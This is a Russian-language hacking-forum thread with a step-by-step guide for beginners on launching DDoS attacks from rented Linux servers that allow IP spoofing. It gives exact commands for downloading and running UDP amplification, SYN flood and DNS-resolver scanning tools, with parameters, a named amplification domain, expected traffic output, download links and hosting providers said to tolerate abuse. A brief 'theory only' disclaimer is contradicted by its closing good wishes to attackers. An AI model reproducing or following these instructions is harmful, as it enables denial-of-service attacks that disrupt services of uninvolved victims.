Ваш ключ: необходима авторизация | MyProxy - бесплатный обменник валидных прокси между пользователями форума.

DDoS атаки с Linux серверов

Тема в разделе DDos/Dos, создана пользователем kyb0, 23 сен 2016.

Войдите для ответа
  1. kyb0 Местный

    kyb0
    Статус:
    Вне сети
    Сообщения:
    69
    Симпатии:
    37
    Регистрация:
    22.06.16
    Автор статьи paran0id никаких побуждений к действию в ней не содержится. Все лишь в теории и для ознакомления!
    Как сказал один мой друг: виндовый ддос бот есть шлак, в любых его проявлениях!
    Так оно и есть, эпоха ддос атак с многочисленных ботнетов давно прошла. Причин тому достаточно:
    - нет нормальных загрузок, продают в основном одно говно в сто рук
    - нет нормального софта в паблике и в продаже, продают различные переделки с сорцов диртджампера, изменив несколько строчек кода и дизайн админки
    - из за причин выше боты мрут буквально как мухи, содержать большой ддос ботнет выходит очень затратно
    - средства защиты от ддос атак сейчас доступны каждому. некоторые хостеры держат 100/150/200 гбит. Провести такую атаку используя винботов нереально. Даже если боты сгенерируют столько траффика (для этого нужны сотни тысяч ботов!!), антиддос системы все равно быстренько перебанят всех ботов и атака будет отбита.

    Современные ддосеры уже давно позабыли что такое дирт джамперы и г-боты и проводят атаки с выделенных nix серверов с широкими каналами. И сервера не простые, а те, где работает ip spoofing (подмена обратного айпи адреса)
    В основном это upd amplification и syn flood, который в nix благо может быть реализован.

    В этом небольшом, так сказать, мануале, я покажу новичкам как проводить такие атаки.
    1. - SSH клиент, для отдачи команд серверам. Рекомендую xshell
      Скачать: http://www.netsarang.com/download/down_xsh.html
      - FTP клиент, что бы распределять днс листы по серверам, любой который вам нравится. Можно юзать wget, но когда серверов много через фтп клиент удобнее
      - Утилитка для разделения txt файла на части. Я использовал split
      Скачать: http://www.sendspace.com/file/4ai08a
      - Собственно сами скрипты udp, syn и сканнер открытых днс резолверов для udp amplification (так же добавил ntp attack и ntp checker с аналогичным принципом использования) Скриты могу позже выложить побольше)
      Скачать: https://mega.co.nz/#!6xl3SIaK!stJbF...x_nVoVzENC7LeEA
      - Ну и конечно сами сервера. Например http://ecatel.co.uk/ любимый всеми ддосерами. На серверах по 155 евро спуффинг благо еще работает.
      Покупаем centos или debian 64 bit, без панели управления. Она нам не нужна, нам нужен только ssh.
      В конце мануала я еще дам ссылки на хостеров у которых можно арендовать нужные сервера.

    Ну вот, предположим вы купили сервер. Коннектимся к нему через ssh клиент.
    Сначала установим glibc необходимый для работы скриптов:​
    yum install glibc.i686 если centos
    apt-get install glibc.i686 если debian​

    Далее заливаем udp, syn и scan на сервер через фтп клиент или​
    wget http://host.com/udp и тд.​

    Ставим на них права 777 в фтп клиенте или​
    chmod -R 777 syn

    На этом пока все, теперь переходим к днс листам.

    Для udp amplification нам понадобятся списки открытых днс резолверов с нужным нам ответом от них.
    Благо хостеру ecatel абсолютно похуй чем вы занимаетесь на своих серверах, поэтому можно смело сканить прямо с них. В других датацентрах я бы не советовал так делать, потому что большинство абуз приходят как раз таки за скан. И вообще что бы насканить лист хватит какой нибудь впски с 100 мбит каналом.
    На каждый сервер нужно примерно 20к днсок, которые мы насканим при помощи скрипта scan. Учтите что на каждый сервер нужен отдельный лист, поэтому если у вас несколько серверов, мы насканим один большой лист и распилим его на нужное количество частей.
    Пример использования:​
    ./scan 1 99999 list.txt 3 admin.gull.ca 3800

    Где:
    1 - начало диапазона
    99999 - конец диапазона
    list.txt - файл куда будут сохранятся днски
    3 - количество потоков, 3 как раз на гигабитный канал
    admin.gull.ca - домен для скана с кучей А записей
    3800 - размер ответа в байтах.

    Мануал по тому как сделать свой домен для скана я приложу чуть позже в дополнение к этому мануалу, а пока домены берем халявные у этих пидоров:
    http://dnsamplificationattacks.blogspot.com/
    Проверяем их командой dig:​
    dig A admin.gull.ca

    или​
    dig ANY admin.gull.ca

    Если ответ 3800+ - смело сканим на этот домен.

    И так с этим разобрались, у нас есть готовый list.txt c днсками внутри. Теперь нужно распилить его утилиткой split на нужное количество частей.
    Например лист получился 10598412 байт, нужно 3 листа на 3 сервера. Запускаем через cmd:​
    split list.txt 3532804

    И утилитка порежет list.txt на куски по 3532804 байт, то есть на 3 равные части.
    Теперь берем эти листы и распределяем по серверам.
    Можете другой утилиткой это делать, главное принцип понятен.
    Готово? Можно ддосить [​IMG]

    Udp flood запускаем так:​
    ./udp 121.2.2.10 80 list.txt 99 1000

    80 - порт
    list.txt - лист наш естественно
    99 - количетсво потоков, больше 100 ставить не рекомендую
    1000 - длительность атаки в секундах

    Syn flood запускаем так:​
    ./syn 121.2.2.10 21 100 -1 1000

    21 - порт
    100 - количество потоков, больше 100 тоже не стоит ставить
    -1 - лимит pps, то есть -1 это без лимита
    1000 - длительность атаки в секундах


    Один сервер генерирует около 10-11 гбит udp траффика и около 1 млн pps syn пакетов. Это именно для серверов ecatel. В других датацентрах ппс и гигабиты на выходе могут отличаться.
    Использовать сервера в разы эффективнее и дешевле обходится чем содержание большого ботнета.
    Да, все делается ручками, это вам не штормбот [​IMG]. Зато на халяву

    Надеюсь информация эта будет кому нибудь полезна, если хоть один чел отсюда узнает что то для себя новое - значит я не зря все это писал [​IMG].
    Если что то интересует, спрашивайте, дополню расскажу подскажу разжую помогу. Успехов, дедосеры [​IMG]


    Вот несколько дц где еще можно купить сервера со спуфингом:
    hxxp://www.servermania.com/
    hxxp://www.us.unmetered.com/
    hxxp://unit-is.com/​
     
    28 сен 2016 #1
    Vegas и ERROR404 нравится это.
  2. Leon13371488 Новорег

    Leon13371488
    Статус:
    Вне сети
    Сообщения:
    4
    Симпатии:
    0
    Регистрация:
    27.09.16
    чееееееееееееееееееееееееееееееееееее
     
    30 сен 2016 #2
  3. LihiyBublik Новорег

    LihiyBublik
    Статус:
    Вне сети
    Сообщения:
    1
    Симпатии:
    1
    Регистрация:
    04.12.16
    Отличная статья)
     
    7 дек 2016 в 20:14 #3
    kyb0 нравится это.
  4. Danilo_7767808 Новорег

    Danilo_7767808
    Статус:
    Вне сети
    Сообщения:
    40
    Симпатии:
    7
    Регистрация:
    24.05.16
    отлично
     
    7 дек 2016 в 22:18 #4
Загрузка...
Похожие темы
  1. kyb0
    Ответов:
    4
    Просмотров:
    940
  2. ERROR404
    Ответов:
    34
    Просмотров:
    2.928
  3. setsey

    Fake DDOS

    setsey, 29 июл 2016, в разделе: DDos/Dos
    Ответов:
    2
    Просмотров:
    367
  4. Zimat
    Ответов:
    2
    Просмотров:
    540
  5. Inkyz
    Ответов:
    0
    Просмотров:
    165
Top